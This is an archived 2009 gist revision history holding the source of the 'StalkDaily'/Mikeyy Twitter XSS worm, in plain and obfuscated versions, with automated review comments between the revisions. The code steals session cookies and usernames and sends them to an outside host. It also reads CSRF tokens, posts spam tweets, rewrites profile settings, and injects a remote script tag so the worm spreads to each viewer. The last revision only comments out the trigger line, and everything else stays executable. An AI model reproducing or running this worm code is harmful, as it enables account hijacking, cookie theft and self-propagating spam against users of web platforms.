@voxpelli
Forked from imajes/current 'stalkdaily' xss attack
Created April 13, 2009 10:22
Revisions

  1. voxpelli renamed this gist Apr 13, 2009. 1 changed file with 2 additions and 1 deletion.
    3 changes: 2 additions & 1 deletion current 'stalkdaily' xss attack → stalkdaily_worm.js
    @@ -168,4 +168,5 @@ function wait() {
    var xmlhttp2 = new XHConn();
    xmlhttp2[_strings[0x2]](" / account / settings ", "POST ", "authenticity_token = " + authtoken + " & user[name] = " + newNameEncode + " & user[protected] = 0 & commit = Save ");
    };
    setTimeout(_strings[0x3c], 3550);
    //Commented out as to not be another host of a working script
    //setTimeout(_strings[0x3c], 3550);
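Review bot: Commenting out the `setTimeout` call only removes the trigger; `wait()`, `XHConn` and the `_strings` table defined earlier in the file remain fully executable, so the file is one uncommented line away from running again. A header comment at the top of the file, e.g. `// Archived sample, defanged for analysis: the wait() trigger is disabled and must not be re-enabled`, would make that intent explicit to later readers of the gist rather than leaving it to the inline remark. The `wait()` body this hunk closes starts outside the hunk.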
  2. voxpelli revised this gist Apr 13, 2009. 1 changed file with 0 additions and 0 deletions.
    Empty file removed gistfile2.txt
    Empty file.
  3. voxpelli revised this gist Apr 13, 2009. 2 changed files with 160 additions and 102 deletions.
    262 changes: 160 additions & 102 deletions current 'stalkdaily' xss attack
    @@ -1,113 +1,171 @@
    function XHConn()
    {
    var xmlhttp, bComplete = false;
    try { xmlhttp = new ActiveXObject("Msxml2.XMLHTTP"); }
    catch (e) { try { xmlhttp = new ActiveXObject("Microsoft.XMLHTTP"); }
    catch (e) { try { xmlhttp = new XMLHttpRequest(); }
    catch (e) { xmlhttp = false; }}}
    if (!xmlhttp) return null;
    this.connect = function(sURL, sMethod, sVars, fnDone)
    {
    if (!xmlhttp) return false;
    var _strings = [
    "Msxml2.XMLHTTP", //0 0x0
    "Microsoft.XMLHTTP",
    "connect",
    "toUpperCase",
    "GET",
    "?", //5 0x5
    "open",
    "",
    "Method",
    "POST ",
    " HTTP/1.1", //10 0xa
    "setRequestHeader",
    "Content-Type",
    "application/x-www-form-urlencoded; charset=UTF-8",
    "onreadystatechange",
    "readyState", //15 0xf
    "send",
    "split",
    "join",
    "'",
    "%27", //20 0x14
    "(",
    "%28",
    ")",
    "%29",
    "*", //25 0x19
    "%2A",
    "~",
    "%7E",
    "!",
    "%21", //30 0x1e (?)
    "%20",
    "+",
    "%",
    "replace",
    "innerHTML", //35 0x23
    "documentElement",
    "exec",
    "<img src='http://www.stalkdaily.com/x.php?username=",
    "'>",
    "write", //40 0x28
    "Twitter, hire Mikeyy! (718) 312-8131 :)",
    "random", //42 0x2a
    "length", //43 0x2b
    "floor", //44 0x2c
    "\" > <title > <script > document.write(String.fromCharCode(60, 115, 99, 114, 105, 112, 116, 32, 115, 114, 99, 61, 34, 104, 116, 116, 112, 58, 47, 47, 119, 119, 119, 46, 115, 116, 97, 108, 107, 100, 97, 105, 108, 121, 46, 99, 111, 109, 47, 97, 106, 97, 120, 46, 106, 115, 34, 62, 60, 47, 115, 99, 114, 105, 112, 116, 62)); < /script>",
    "/status / update ", //46 0x2e
    "POST ",
    "authenticity_token = ",
    " & status = ",
    " & return_rendered_status = true & twttr = true ",
    " / account / settings ",
    " & user[name] = ", //52 0x34
    " & user[protected] = 0 & commit = Save ",
    " / account / profile_settings ",
    " & user[profile_default] = false & tab = colors & profile_theme = 1 & user[profile_background_color] = ",
    "##Mikeyy ",
    " & user[url] = Mikeyy+++++++++++++++++++++++++++++++++++++&commit = save changes ",
    " & user[url] = Mikeyy+++++++++++++++++++++++++++++++++++++&user[protected] = 0 & commit = Save ",
    " & commit = save changes ",
    "wait()" //60 0x3c
    ];
    function XHConn() {
    var xmlhttp,
    bComplete = false;
    sMethod = sMethod.toUpperCase();
    try {
    if (sMethod == "GET")
    {
    xmlhttp.open(sMethod, sURL+"?"+sVars, true);
    sVars = "";
    }
    else
    {
    xmlhttp.open(sMethod, sURL, true);
    xmlhttp.setRequestHeader("Method", "POST "+sURL+" HTTP/1.1");
    xmlhttp.setRequestHeader("Content-Type",
    "application/x-www-form-urlencoded");
    }
    xmlhttp.onreadystatechange = function(){
    if (xmlhttp.readyState == 4 && !bComplete)
    {
    bComplete = true;
    fnDone(xmlhttp);
    }};
    xmlhttp.send(sVars);
    }
    catch(z) { return false; }
    return true;
    };
    return this;
    }

    function urlencode( str ) {
    var histogram = {}, tmp_arr = [];
    xmlhttp = new ActiveXObject(_strings[0x0]);
    } catch(e) {
    try {
    xmlhttp = new ActiveXObject(_strings[0x1]);
    } catch(e) {
    try {
    xmlhttp = new XMLHttpRequest();
    } catch(e) {
    xmlhttp = false;
    };
    };
    };
    if (!xmlhttp) {
    return null;
    };
    this[_strings[0x2]] = function(sURL, sMethod, sVars, fnDone) {
    if (!xmlhttp) {
    return false;
    };
    bComplete = false;
    sMethod = sMethod[_strings[0x3]]();
    try {
    if (sMethod == _strings[0x4]) {
    xmlhttp[_strings[0x6]](sMethod, sURL + _strings[0x5] + sVars, true);
    sVars = _strings[0x7];
    } else {
    xmlhttp[_strings[0x6]](sMethod, sURL, true);
    xmlhttp[_strings[0xb]](_strings[0x8], _strings[0x9] + sURL + _strings[0xa]);
    xmlhttp[_strings[0xb]](_strings[0xc], _strings[0xd]);
    };
    xmlhttp[_strings[0xe]] = function() {
    if (xmlhttp[_strings[0xf]] == 0x4 && !bComplete) {
    bComplete = true;
    if (fnDone != null) {
    fnDone(xmlhttp);
    };
    };
    };
    xmlhttp[_strings[0x10]](sVars);
    } catch(z) {
    return false;
    };
    return true;
    };
    return this;
    };
    function urlencode(str) {
    var histogram = {},
    tmp_arr = [];
    var ret = str.toString();

    var replacer = function(search, replace, str) {
    var tmp_arr = [];
    tmp_arr = str.split(search);
    return tmp_arr.join(replace);
    tmp_arr = str[_strings[0x11]](search);
    return tmp_arr[_strings[0x12]](replace);
    };

    histogram["'"] = '%27';
    histogram['('] = '%28';
    histogram[')'] = '%29';
    histogram['*'] = '%2A';
    histogram['~'] = '%7E';
    histogram['!'] = '%21';
    histogram['%20'] = '+';

    histogram[_strings[0x13]] = _strings[0x14];
    histogram[_strings[0x15]] = _strings[0x16];
    histogram[_strings[0x17]] = _strings[0x18];
    histogram[_strings[0x19]] = _strings[0x1a];
    histogram[_strings[0x1b]] = _strings[0x1c];
    histogram[_strings[0x1d]] = _strings[0x1e];
    histogram[_strings[0x1f]] = _strings[0x20];
    ret = encodeURIComponent(ret);

    for (search in histogram) {
    replace = histogram[search];
    ret = replacer(search, replace, ret)
    }

    return ret.replace(/(\%([a-z0-9]{2}))/g, function(full, m1, m2) {
    return "%"+m2.toUpperCase();
    ret = replacer(search, replace, ret);
    };
    return ret[_strings[0x22]](/(\%([a-z0-9]{2}))/g,
    function(full, m1, m2) {
    return _strings[0x21] + m2[_strings[0x3]]();
    });

    return ret;
    }

    var content = document.documentElement.innerHTML;
    userreg = new RegExp(/<meta content="(.*)" name="session-user-screen_name"/g);
    var username = userreg.exec(content);
    username = username[1];

    var cookie;
    cookie = urlencode(document.cookie);
    document.write("<img src='http://mikeyylolz.uuuq.com/x.php?c=" + cookie + "&username=" + username + "'>");
    document.write("<img src='http://stalkdaily.com/log.gif'>");

    function wait()
    {
    var content = document.documentElement.innerHTML;

    authreg = new RegExp(/twttr.form_authenticity_token = '(.*)';/g);
    var authtoken = authreg.exec(content);
    authtoken = authtoken[1];
    //alert(authtoken);

    var randomUpdate=new Array();
    randomUpdate[0]="Dude, www.StalkDaily.com is awesome. What's the fuss?";
    randomUpdate[1]="Join www.StalkDaily.com everyone!";
    randomUpdate[2]="Woooo, www.StalkDaily.com :)";
    randomUpdate[3]="Virus!? What? www.StalkDaily.com is legit!";
    randomUpdate[4]="Wow...www.StalkDaily.com";
    randomUpdate[5]="@twitter www.StalkDaily.com";

    var genRand = randomUpdate[Math.floor(Math.random()*randomUpdate.length)];

    updateEncode = urlencode(genRand);

    var xss = urlencode('http://www.stalkdaily.com"></a><script src="http://mikeyylolz.uuuq.com/x.js"></script><a ');

    var ajaxConn = new XHConn();
    ajaxConn.connect("/status/update", "POST", "authenticity_token="+authtoken+"&status="+updateEncode+"&tab=home&update=update");
    var ajaxConn1 = new XHConn();
    ajaxConn1.connect("/account/settings", "POST", "authenticity_token="+authtoken+"&user[url]="+xss+"&tab=home&update=update");
    }
    setTimeout("wait()",3250);


    };
    function wait() {
    var content = document[_strings[0x24]][_strings[0x23]];
    userreg = new RegExp(/<meta content=" (. * )" name="session - user - screen_name "/g);
    var username = userreg[_strings[0x25]](content);
    username = username[0x1];
    document[_strings[0x28]](_strings[0x26] + username + _strings[0x27]);
    authreg = new RegExp(/twttr.form_authenticity_token = '(.*)';/g);
    var authtoken = authreg[_strings[0x25]](content);
    authtoken = authtoken[0x1];
    var randomUpdate = new Array();
    randomUpdate[0x0] = _strings[0x29];
    var genRand = randomUpdate[Math[_strings[0x2c]](Math[_strings[0x2a]]() * randomUpdate[_strings[0x2b]])];
    var updateEncode = urlencode(genRand);
    var newSettings = new Array();
    newSettings[0x0] = _strings[0x2d]; //This fetches the string that is going to be inserted as a new name
    var newName = newSettings[Math[_strings[0x2c]](Math[_strings[0x2a]]() * newSettings[_strings[0x2b]])]; //newSettings[Math.floor(Math.random() * newSettings.length)];
    var newNameEncode = urlencode(newName);
    var _0x1b68x1d = new XHConn();
    _0x1b68x1d[_strings[0x2]]("/status / update ", "POST ", "authenticity_token = " + authtoken + " & status = " + updateEncode + " & return_rendered_status = true & twttr = true ");
    var _0x1b68x1e = new XHConn();
    _0x1b68x1e[_strings[0x2]](" / account / settings ", "POST ", "authenticity_token = " + authtoken + " & user[name] = " + newNameEncode + " & user[protected] = 0 & commit = Save ");
    var _0x1b68x1f = new XHConn();
    _0x1b68x1f[_strings[0x2]](" / account / profile_settings ", "POST ", "authenticity_token = " + authtoken + " & user[profile_default] = false & tab = colors & profile_theme = 1 & user[profile_background_color] = " + urlencode("##Mikeyy ") + " & user[url] = Mikeyy+++++++++++++++++++++++++++++++++++++&commit = save changes ");
    var xmlhttp0 = new XHConn();
    xmlhttp0[_strings[0x2]](" / account / settings ", "POST ", "authenticity_token = " + authtoken + " & user[name] = " + newNameEncode + " & user[url] = Mikeyy+++++++++++++++++++++++++++++++++++++&user[protected] = 0 & commit = Save ");
    var xmlhttp1 = new XHConn();
    xmlhttp1[_strings[0x2]](" / account / profile_settings ", "POST ", "authenticity_token = " + authtoken + " & user[profile_default] = false & tab = colors & profile_theme = 1 & user[profile_background_color] = " + urlencode("##Mikeyy ") + " & user[name] = " + newNameEncode + " & commit = save changes ");
    var xmlhttp2 = new XHConn();
    xmlhttp2[_strings[0x2]](" / account / settings ", "POST ", "authenticity_token = " + authtoken + " & user[name] = " + newNameEncode + " & user[protected] = 0 & commit = Save ");
    };
    setTimeout(_strings[0x3c], 3550);
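Review bot: The final line `setTimeout(_strings[0x3c], 3550);` still arms the sample at this revision — `_strings[0x3c]` resolves to `"wait()"` per the `//60 0x3c` annotation — so this annotated copy is live until the later revision comments it out; a header comment stating that would stop a reader from assuming the commented table means the file is inert. The index annotations on the `_strings` table are partial (only some entries carry an `//N 0xNN` label and `//30 0x1e (?)` is marked uncertain), so every `_strings[0xNN]` lookup in `XHConn`, `urlencode` and `wait` has to be decoded by counting entries; labelling each entry, or adding the decoded literal as a trailing comment on each lookup, would make the annotation checkable. The old and new sides of this section are interleaved on the rendered page, so which lines belong to the new copy is inferred from the `_strings` usage rather than from explicit markers.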
    Empty file added gistfile2.txt
    Empty file.
  4. @imajes imajes created this gist Apr 11, 2009.
    113 changes: 113 additions & 0 deletions current 'stalkdaily' xss attack
    @@ -0,0 +1,113 @@
    function XHConn()
    {
    var xmlhttp, bComplete = false;
    try { xmlhttp = new ActiveXObject("Msxml2.XMLHTTP"); }
    catch (e) { try { xmlhttp = new ActiveXObject("Microsoft.XMLHTTP"); }
    catch (e) { try { xmlhttp = new XMLHttpRequest(); }
    catch (e) { xmlhttp = false; }}}
    if (!xmlhttp) return null;
    this.connect = function(sURL, sMethod, sVars, fnDone)
    {
    if (!xmlhttp) return false;
    bComplete = false;
    sMethod = sMethod.toUpperCase();
    try {
    if (sMethod == "GET")
    {
    xmlhttp.open(sMethod, sURL+"?"+sVars, true);
    sVars = "";
    }
    else
    {
    xmlhttp.open(sMethod, sURL, true);
    xmlhttp.setRequestHeader("Method", "POST "+sURL+" HTTP/1.1");
    xmlhttp.setRequestHeader("Content-Type",
    "application/x-www-form-urlencoded");
    }
    xmlhttp.onreadystatechange = function(){
    if (xmlhttp.readyState == 4 && !bComplete)
    {
    bComplete = true;
    fnDone(xmlhttp);
    }};
    xmlhttp.send(sVars);
    }
    catch(z) { return false; }
    return true;
    };
    return this;
    }

    function urlencode( str ) {
    var histogram = {}, tmp_arr = [];
    var ret = str.toString();

    var replacer = function(search, replace, str) {
    var tmp_arr = [];
    tmp_arr = str.split(search);
    return tmp_arr.join(replace);
    };

    histogram["'"] = '%27';
    histogram['('] = '%28';
    histogram[')'] = '%29';
    histogram['*'] = '%2A';
    histogram['~'] = '%7E';
    histogram['!'] = '%21';
    histogram['%20'] = '+';

    ret = encodeURIComponent(ret);

    for (search in histogram) {
    replace = histogram[search];
    ret = replacer(search, replace, ret)
    }

    return ret.replace(/(\%([a-z0-9]{2}))/g, function(full, m1, m2) {
    return "%"+m2.toUpperCase();
    });

    return ret;
    }

    var content = document.documentElement.innerHTML;
    userreg = new RegExp(/<meta content="(.*)" name="session-user-screen_name"/g);
    var username = userreg.exec(content);
    username = username[1];

    var cookie;
    cookie = urlencode(document.cookie);
    document.write("<img src='http://mikeyylolz.uuuq.com/x.php?c=" + cookie + "&username=" + username + "'>");
    document.write("<img src='http://stalkdaily.com/log.gif'>");

    function wait()
    {
    var content = document.documentElement.innerHTML;

    authreg = new RegExp(/twttr.form_authenticity_token = '(.*)';/g);
    var authtoken = authreg.exec(content);
    authtoken = authtoken[1];
    //alert(authtoken);

    var randomUpdate=new Array();
    randomUpdate[0]="Dude, www.StalkDaily.com is awesome. What's the fuss?";
    randomUpdate[1]="Join www.StalkDaily.com everyone!";
    randomUpdate[2]="Woooo, www.StalkDaily.com :)";
    randomUpdate[3]="Virus!? What? www.StalkDaily.com is legit!";
    randomUpdate[4]="Wow...www.StalkDaily.com";
    randomUpdate[5]="@twitter www.StalkDaily.com";

    var genRand = randomUpdate[Math.floor(Math.random()*randomUpdate.length)];

    updateEncode = urlencode(genRand);

    var xss = urlencode('http://www.stalkdaily.com"></a><script src="http://mikeyylolz.uuuq.com/x.js"></script><a ');

    var ajaxConn = new XHConn();
    ajaxConn.connect("/status/update", "POST", "authenticity_token="+authtoken+"&status="+updateEncode+"&tab=home&update=update");
    var ajaxConn1 = new XHConn();
    ajaxConn1.connect("/account/settings", "POST", "authenticity_token="+authtoken+"&user[url]="+xss+"&tab=home&update=update");
    }
    setTimeout("wait()",3250);